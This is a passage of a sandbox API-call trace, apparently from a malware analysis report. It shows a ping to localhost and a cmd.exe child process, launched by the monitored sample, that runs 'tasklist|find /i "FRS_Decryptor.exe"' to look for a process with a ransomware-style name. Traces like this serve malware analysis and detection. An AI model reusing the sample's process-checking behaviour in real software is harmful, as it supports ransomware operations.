lpUsedDefaultChar=0x0) returned 10 [0075.299] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xc289d0 [0075.300] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xc289d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0075.300] _fileno (_File=0x76ea4c28) returned 1 [0075.300] _write (in: _FileHandle=1, _Buf=0xc289d0*, _MaxCharCount=0x9 | out: _Buf=0xc289d0*) returned 9 [0075.300] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.300] _fileno (_File=0x76ea4c28) returned 1 [0075.300] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0075.300] LocalFree (hMem=0xc289d0) returned 0x0 [0075.300] LocalFree (hMem=0xc37fa0) returned 0x0 [0075.300] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xacf3ac, nSize=0x0, Arguments=0xacf3a8 | out: lpBuffer="羠Ãﵼ¬➷\x94䰨盪✧") returned 0x9 [0075.300] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.300] _fileno (_File=0x76ea4c28) returned 1 [0075.300] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.300] GetFileType (hFile=0x28) returned 0x2 [0075.300] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf370 | out: lpMode=0xacf370) returned 0 [0075.300] GetLastError () returned 0x6 [0075.300] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf2d4, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0075.300] _fileno (_File=0x76ea4c28) returned 1 [0075.300] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0075.300] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.300] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xc28ac0 [0075.300] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xc28ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0075.300] _fileno (_File=0x76ea4c28) returned 1 [0075.300] _write (in: _FileHandle=1, _Buf=0xc28ac0*, _MaxCharCount=0x9 | out: _Buf=0xc28ac0*) returned 9 [0075.300] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.300] _fileno (_File=0x76ea4c28) returned 1 [0075.300] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0075.300] LocalFree (hMem=0xc28ac0) returned 0x0 [0075.300] LocalFree (hMem=0xc37fa0) returned 0x0 [0075.300] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xacf3a8, nSize=0x0, Arguments=0xacf3a4 | out: lpBuffer="羠Ãﵼ¬⟘\x94䰨盪✨") returned 0x9 [0075.300] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.300] _fileno (_File=0x76ea4c28) returned 1 [0075.300] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.300] GetFileType (hFile=0x28) returned 0x2 [0075.300] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf36c | out: lpMode=0xacf36c) returned 0 [0075.300] GetLastError () returned 0x6 [0075.300] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf2d0, nSize=0x50 | out: lpBuffer="¬✨") returned 0x0 [0075.300] _fileno (_File=0x76ea4c28) returned 1 [0075.300] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0075.301] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.301] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xc289d0 [0075.301] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xc289d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0075.301] _fileno (_File=0x76ea4c28) returned 1 [0075.301] _write (in: _FileHandle=1, _Buf=0xc289d0*, _MaxCharCount=0x9 | out: _Buf=0xc289d0*) returned 9 [0075.301] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.301] _fileno (_File=0x76ea4c28) returned 1 [0075.301] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0075.301] LocalFree (hMem=0xc289d0) returned 0x0 [0075.301] LocalFree (hMem=0xc37fa0) returned 0x0 [0075.301] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xacf330, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0075.301] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xacf304, nSize=0x0, Arguments=0xacf300 | out: lpBuffer="羠Ã¬᧰\x94䰨盪❏") returned 0x5c [0075.301] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.301] _fileno (_File=0x76ea4c28) returned 1 [0075.301] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.301] GetFileType (hFile=0x28) returned 0x2 [0075.301] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf2c8 | out: lpMode=0xacf2c8) returned 0 [0075.301] GetLastError () returned 0x6 [0075.301] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf22c, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0075.301] _fileno (_File=0x76ea4c28) returned 1 [0075.301] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0075.301] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0075.301] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0xc38068 [0075.301] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xc38068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0075.301] _fileno (_File=0x76ea4c28) returned 1 [0075.301] _write (in: _FileHandle=1, _Buf=0xc38068*, _MaxCharCount=0x5c | out: _Buf=0xc38068*) returned 92 [0075.301] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.301] _fileno (_File=0x76ea4c28) returned 1 [0075.301] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0075.301] LocalFree (hMem=0xc38068) returned 0x0 [0075.301] LocalFree (hMem=0xc37fa0) returned 0x0 [0075.301] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xacf310, nSize=0x0, Arguments=0xacf30c | out: lpBuffer="羠Ã¬ᨧ\x94䰨盪❓") returned 0x61 [0075.301] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.301] _fileno (_File=0x76ea4c28) returned 1 [0075.301] _get_osfhandle (_FileHandle=1) returned 0x28 [0075.301] GetFileType (hFile=0x28) returned 0x2 [0075.301] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf2d4 | out: lpMode=0xacf2d4) returned 0 [0075.301] GetLastError () returned 0x6 [0075.302] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf238, nSize=0x50 | out: lpBuffer="¬❓") returned 0x0 [0075.302] _fileno (_File=0x76ea4c28) returned 1 [0075.302] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0075.302] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0075.302] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xc38070 [0075.302] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xc38070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0075.302] _fileno (_File=0x76ea4c28) returned 1 [0075.302] _write (in: _FileHandle=1, _Buf=0xc38070*, _MaxCharCount=0x61 | out: _Buf=0xc38070*) returned 97 [0075.302] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0075.302] _fileno (_File=0x76ea4c28) returned 1 [0075.302] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0075.302] LocalFree (hMem=0xc38070) returned 0x0 [0075.302] LocalFree (hMem=0xc37fa0) returned 0x0 [0075.302] IcmpCloseHandle (IcmpHandle=0xc269f8) returned 1 [0075.302] LocalFree (hMem=0xc2c250) returned 0x0 [0075.302] LocalFree (hMem=0xc35270) returned 0x0 [0075.302] WSACleanup () returned 0 [0075.303] exit (_Code=0) Thread: id = 179 os_tid = 0x7d8 Thread: id = 180 os_tid = 0x6b4 Process: id = "54" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x13450000" os_pid = "0xaec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2935 start_va = 0x380000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 2936 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 2937 start_va = 0x3b0000 end_va = 0x3befff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2938 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2939 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2940 start_va = 0x500000 end_va = 0x503fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 2941 start_va = 0x510000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 2942 start_va = 0x520000 end_va = 0x521fff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 2943 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2944 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2945 start_va = 0x7f400000 end_va = 0x7f422fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f400000" filename = "" Region: id = 2946 start_va = 0x7f423000 end_va = 0x7f423fff entry_point = 0x0 region_type = private name = "private_0x000000007f423000" filename = "" Region: id = 2947 start_va = 0x7f424000 end_va = 0x7f424fff entry_point = 0x0 region_type = private name = "private_0x000000007f424000" filename = "" Region: id = 2948 start_va = 0x7f42d000 end_va = 0x7f42ffff entry_point = 0x0 region_type = private name = "private_0x000000007f42d000" filename = "" Region: id = 2949 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2950 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2951 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2952 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 2953 start_va = 0x720000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 2954 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2955 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2956 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2957 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 2958 start_va = 0x530000 end_va = 0x5adfff entry_point = 0x530000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2959 start_va = 0x610000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2960 start_va = 0x890000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 2961 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2962 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2963 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2964 start_va = 0x7f300000 end_va = 0x7f3fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f300000" filename = "" Region: id = 2965 start_va = 0x390000 end_va = 0x393fff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 2966 start_va = 0x990000 end_va = 0xc64fff entry_point = 0x990000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2985 start_va = 0x3a0000 end_va = 0x3a3fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Thread: id = 181 os_tid = 0xadc [0075.337] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0075.337] __set_app_type (_Type=0x1) [0075.337] __p__fmode () returned 0x76ea1768 [0075.337] __p__commode () returned 0x76ea176c [0075.337] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0075.338] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0075.338] GetCurrentThreadId () returned 0xadc [0075.338] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xadc) returned 0x34 [0075.338] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0075.338] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0075.338] SetThreadUILanguage (LangId=0x0) returned 0x409 [0075.340] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0075.340] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ffc54 | out: phkResult=0x4ffc54*=0x0) returned 0x2 [0075.340] VirtualQuery (in: lpAddress=0x4ffc63, lpBuffer=0x4ffbfc, dwLength=0x1c | out: lpBuffer=0x4ffbfc*(BaseAddress=0x4ff000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0075.340] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x4ffbfc, dwLength=0x1c | out: lpBuffer=0x4ffbfc*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0075.341] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x4ffbfc, dwLength=0x1c | out: lpBuffer=0x4ffbfc*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0075.341] VirtualQuery (in: lpAddress=0x403000, lpBuffer=0x4ffbfc, dwLength=0x1c | out: lpBuffer=0x4ffbfc*(BaseAddress=0x403000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0075.341] VirtualQuery (in: lpAddress=0x500000, lpBuffer=0x4ffbfc, dwLength=0x1c | out: lpBuffer=0x4ffbfc*(BaseAddress=0x500000, AllocationBase=0x500000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0075.341] GetConsoleOutputCP () returned 0x1b5 [0075.341] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0075.341] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0075.341] _get_osfhandle (_FileHandle=1) returned 0x2a0 [0075.341] SetConsoleMode (hConsoleHandle=0x2a0, dwMode=0x0) returned 0 [0075.341] _get_osfhandle (_FileHandle=1) returned 0x2a0 [0075.341] GetConsoleMode (in: hConsoleHandle=0x2a0, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0075.341] _get_osfhandle (_FileHandle=0) returned 0x24 [0075.341] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0075.341] GetEnvironmentStringsW () returned 0x8940c0* [0075.342] FreeEnvironmentStringsA (penv="=") returned 1 [0075.342] GetEnvironmentStringsW () returned 0x8940c0* [0075.342] FreeEnvironmentStringsA (penv="=") returned 1 [0075.342] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4feba4 | out: phkResult=0x4feba4*=0x44) returned 0x0 [0075.342] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4febac, lpData=0x4febb0, lpcbData=0x4feba8*=0x1000 | out: lpType=0x4febac*=0x0, lpData=0x4febb0*=0x0, lpcbData=0x4feba8*=0x1000) returned 0x2 [0075.342] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4febac, lpData=0x4febb0, lpcbData=0x4feba8*=0x1000 | out: lpType=0x4febac*=0x4, lpData=0x4febb0*=0x1, lpcbData=0x4feba8*=0x4) returned 0x0 [0075.342] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4febac, lpData=0x4febb0, lpcbData=0x4feba8*=0x1000 | out: lpType=0x4febac*=0x0, lpData=0x4febb0*=0x1, lpcbData=0x4feba8*=0x1000) returned 0x2 [0075.342] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4febac, lpData=0x4febb0, lpcbData=0x4feba8*=0x1000 | out: lpType=0x4febac*=0x4, lpData=0x4febb0*=0x0, lpcbData=0x4feba8*=0x4) returned 0x0 [0075.342] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4febac, lpData=0x4febb0, lpcbData=0x4feba8*=0x1000 | out: lpType=0x4febac*=0x4, lpData=0x4febb0*=0x40, lpcbData=0x4feba8*=0x4) returned 0x0 [0075.342] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4febac, lpData=0x4febb0, lpcbData=0x4feba8*=0x1000 | out: lpType=0x4febac*=0x4, lpData=0x4febb0*=0x40, lpcbData=0x4feba8*=0x4) returned 0x0 [0075.342] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4febac, lpData=0x4febb0, lpcbData=0x4feba8*=0x1000 | out: lpType=0x4febac*=0x0, lpData=0x4febb0*=0x40, lpcbData=0x4feba8*=0x1000) returned 0x2 [0075.342] RegCloseKey (hKey=0x44) returned 0x0 [0075.342] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4feba4 | out: phkResult=0x4feba4*=0x44) returned 0x0 [0075.342] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4febac, lpData=0x4febb0, lpcbData=0x4feba8*=0x1000 | out: lpType=0x4febac*=0x0, lpData=0x4febb0*=0x40, lpcbData=0x4feba8*=0x1000) returned 0x2 [0075.342] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4febac, lpData=0x4febb0, lpcbData=0x4feba8*=0x1000 | out: lpType=0x4febac*=0x4, lpData=0x4febb0*=0x1, lpcbData=0x4feba8*=0x4) returned 0x0 [0075.342] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4febac, lpData=0x4febb0, lpcbData=0x4feba8*=0x1000 | out: lpType=0x4febac*=0x0, lpData=0x4febb0*=0x1, lpcbData=0x4feba8*=0x1000) returned 0x2 [0075.342] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4febac, lpData=0x4febb0, lpcbData=0x4feba8*=0x1000 | out: lpType=0x4febac*=0x4, lpData=0x4febb0*=0x0, lpcbData=0x4feba8*=0x4) returned 0x0 [0075.342] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4febac, lpData=0x4febb0, lpcbData=0x4feba8*=0x1000 | out: lpType=0x4febac*=0x4, lpData=0x4febb0*=0x9, lpcbData=0x4feba8*=0x4) returned 0x0 [0075.342] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4febac, lpData=0x4febb0, lpcbData=0x4feba8*=0x1000 | out: lpType=0x4febac*=0x4, lpData=0x4febb0*=0x9, lpcbData=0x4feba8*=0x4) returned 0x0 [0075.342] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4febac, lpData=0x4febb0, lpcbData=0x4feba8*=0x1000 | out: lpType=0x4febac*=0x0, lpData=0x4febb0*=0x9, lpcbData=0x4feba8*=0x1000) returned 0x2 [0075.342] RegCloseKey (hKey=0x44) returned 0x0 [0075.342] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa50076 [0075.343] srand (_Seed=0x5aa50076) [0075.343] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0075.343] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0075.343] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0075.343] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x8940c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0075.343] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0075.343] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0075.343] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0075.343] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0075.343] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0075.343] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0075.343] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0075.343] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0075.343] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0075.343] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0075.343] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0075.343] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0075.343] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0075.343] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ff984 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0075.343] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x4ff984, lpFilePart=0x4ff980 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x4ff980*="Desktop") returned 0x1c [0075.344] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0075.344] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4ff700 | out: lpFindFileData=0x4ff700) returned 0x8942d8 [0075.344] FindClose (in: hFindFile=0x8942d8 | out: hFindFile=0x8942d8) returned 1 [0075.345] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x4ff700 | out: lpFindFileData=0x4ff700) returned 0x8942d8 [0075.345] 